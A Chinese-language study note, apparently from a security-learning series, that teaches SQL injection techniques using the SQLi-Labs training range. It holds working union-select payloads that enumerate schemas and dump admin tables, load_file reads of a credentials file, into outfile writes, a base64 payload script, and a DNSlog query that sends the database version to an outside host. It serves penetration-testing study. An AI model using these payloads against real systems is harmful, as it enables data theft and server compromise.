本系列侧重方法论,各工具只是实现目标的载体。
命令与工具只做简单介绍,其使用另见《安全工具录》。
靶场使用 SQLi-Labs。详情参见《WriteUp:SQLi-Labs》
SQL 注入非常复杂,区分各种数据库类型,提交方法,数据类型等注入。此类漏洞是 WEB 安全中严重的漏洞,学习如何利用,挖掘,修复也很重要。
SQL 注入就是在数据交互中,前端数据传到后台时没有做严格的判断,导致传进来的数据被拼接到 sql 语句中,被当作 sql 语句的一部分进行执行,从而导致数据泄露、丢失甚至服务器瘫痪。
常见的 sql 注入产生原因:
注入判断:
1、逻辑值
and 1 = 1 页面正常
and 1 = 2 页面异常
则可能存在注入点
2、order by
通过 order by 判断注入的字段数
SQL 注入思路都差不多,这里主要以 MySQL 为例。
数据库版本:version()
数据库名字:database()
数据库用户:user()
操作系统:@@version_compile_os
在 mysql5.0 以上版本存在 information_schema 数据库,记录着所有的数据库,表名,列名。
information_schema.tables # 记录所有的表名
information_schema.columns # 记录所有的列名
table_name # 表名
column_name # 列名
table_schema # 数据库名
本节示例见 SQLi-Labs Less-1。
常见的数据库与用户的对应关系:
数据库用户A - 数据库A - 网站A --> 表名 --> 列名 --> 数据
数据库用户B - 数据库B - 网站B --> 表名 --> 列名 --> 数据
数据库用户C - 数据库C - 网站C --> 表名 --> 列名 --> 数据
这样做的好处是一个用户对应一个库,网站之间的用户权限与数据互不干扰
这是最基础的数据库模型,现在大网站都是分布式数据库。
跨库查询的前提条件是必须高权限的用户才能执行跨库查询。
跨库攻击,以 Less-2 示例:
# 获取所有数据库名:
http://127.0.0.1:8080/sqlilabs/Less-2/?id=-1 union select 1,group_concat(schema_name),3 from information_schema.schemata
# 获取指定 qqyw 数据库名下的表名信息:
union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='qqyw'
获取指定 qqyw 下的表名 admin 下的列名信息:
union select 1,group_concat(column_name),3 from information_schema.columns where table_name='admin' and table_schema='qqyw'
获取指定 qqyw 下的 admin 数据
union select 1,u,p,4 from qqyw.admin
获取的数据库权限会影响下一步测试思路。
高权限直接测试。
低权限就一步一步获取数据。
文件读写操作:
获取路径的常见方法:报错显示、遗留文件、漏洞报错、平台配置文件、爆破等。
MySQL 查询是否有写入权限:
show global variables like '%secure_file_priv%';
读取本地文件示例:
http://127.0.0.1:8888/Less-2/?id=-1 union select 1,load_file('E:\\Software\\PhpStudy\\phpstudy_pro\\WWW\\sqli-labs-master\\sql-connections\\db-creds.inc'),3
本地文件写入示例:
http://127.0.0.1:8888/Less-2/?id=-1 union select 1, 'test' ,3 into outfile 'E:\\test.txt' --+
魔术引号:magic_quotes_gpc
当 magic_quotes_gpc = On 时,输入数据中含单引号(’)、双引号(”)、反斜线(\)与 NULL(NULL 字符)等字符,都会加上转义符号(\)。
自定义防护:例如 PHP 中的判断输入是否是 int 型数据:is_int() 函数,这种就无法绕过。
具体示例见 SQLi-Labs。
在真实 SQL 注入安全测试中,一定要明确提交数据类型及提交方法后再进行注入。
明确参数类型:数字、字符、JSON 等。
明确接受的请求方法:GET、POST、COOKIE、REQUEST、HTTP 头等。
sql 语句干扰符号:'、"、、)、} 等,具体需看写法。
进行 SQL 注入时,有很多注入会出现无回显的情况,其中不回显的原因可能是 SQL 语句查询方式的问题导致,这个时候需要用到相关的报错或盲注进行后续操作。
手工注入时,提前了解或预知其 SQL 语句大概写法也能更好的选择对应的注入语句。
可以通过查询方式与 SQL 的关系、注入点产生的地方猜测到 SQL 查询方式。
涉及的 SQL 语句:
select:查询数据,在网站应用中进行数据显示查询操作。
insert:插入数据,在网站应用中进行用户注册添加等操作。
delete:删除数据,后台管理里面删除文章删除用户等操作。
update:更新数据,会员或后台中心数据同步或缓存等操作。
order by:数据排序,一般结合表名或列名进行数据排序操作。
在注入过程中,获取的数据不能回显至前端页面。此时需要利用一些方法进行判断或者尝试,这个过程称之为盲注。
盲注分为以下三类:
具体示例见 SQLi-Labs。
参考文章:
12种报错注入+万能语句
sql报错注入:extractvalue、updatexml报错原理
Order by排序注入方法小总结
一些变量值在传递时会先编码或加密(如 base64 等)。这时手工注入就要先把传递值进行相应编码或加密。
例如 admin' and 1=1
base64 编码后的值是 YWRtaW4nIGFuZCAxPTE=
实际案例:SQLi-Labs-Less21:cookie&base64编码注入
一个简单的 base64 编码脚本:
$url='http://xxxx/Less-1/index.php?id=;
$payload=base64_encode($_GET['x']);
$urls=$url.$payload;
file_get_contents($urls);
echo $urls;
?>
二次注入一般用于白盒测试,黑盒测试就算找到注入点也没办法攻击。
以 SQLi-Labs-Less24 为例:注册 admin'#
这样一个用户。
此时修改 admin'#
用户的密码就能把 admin
用户的密码修改。
DNSlog 盲注仅限于 windos 环境。能优化无回显问题。
相关资源:http://ceye.io
示例:
select * from users where id=1 and if((select load_file(concat('\\\\',(select version()),'.eii0i8.ceye.io\\abc'))),1,0);
参考文章:https://www.cnblogs.com/xhds/p/12322839.html
在 MySQL 中,每一条语句结尾加【;】表示语句结束。
堆叠注入(stacked injection)就是多个语句连接到一起执行的注入。
应用场景:
参考文章:堆叠注入详解
在攻防实战中,往往需要掌握一些特性,比如服务器、数据库、应用层、WAF 层等,以便灵活构造 Payload,从而和各种 WAF 进行对抗。
简要来说,WAF 有以下功能:
内容审计
截获所有 HTTP 数据或不满足某些规则的会话
访问控制
控制对 Web 应用的访问,包括主动安全模式和被动安全模式
架构 / 网络设计
运行反向代理模式时,用来分配职能,集中控制,虚拟基础结构等
WEB 应用加固
屏蔽 WEB 应用固有弱点,保护 WEB 应用编程错误导致的安全隐患。
WAF 的常见功能:
WAF 对扫描器防范手段:
参考文章:
SQL注入-WAF绕过
sqlmap超详细笔记+思维导图
Access,关系型数据库。
Access 数据库比较特别,都是存放在网站目录下,后缀格式为 mdb,常搭配脚本
asp,asa,可以通过一些暴库手段、目录猜解等直接下载数据库。
结构:
Access -> 表名 -> 列名 -> 数据
注入方式:
union 注入、http header 注入、偏移注入等。
Access 偏移注入:解决列名获取不到的情况。
查看登陆框源代码的表单值或观察 URL 特征等,也可以针对表或列获取不到的情况。
参考文章:Access偏移注入与原理
Microsoft SQL Server,也叫 MSSQL,关系型数据库。
注入方式和 MySQL 没什么两样。
参考文章:MSSQL注入
PostgreSQL,关系型数据库。
参考文章:PostGresql 注入知识汇总
Oracle,关系型数据库。
参考文章:【实战】Oracle注入总结
MongoDB 是一个基于分布式文件存储的数据库,属于非关系型数据库。
一个针对 MongoDB 注入的工具:NoSQLAttack
淡云孤雁远,寒日暮天红。
——《临江仙》(五代)徐昌图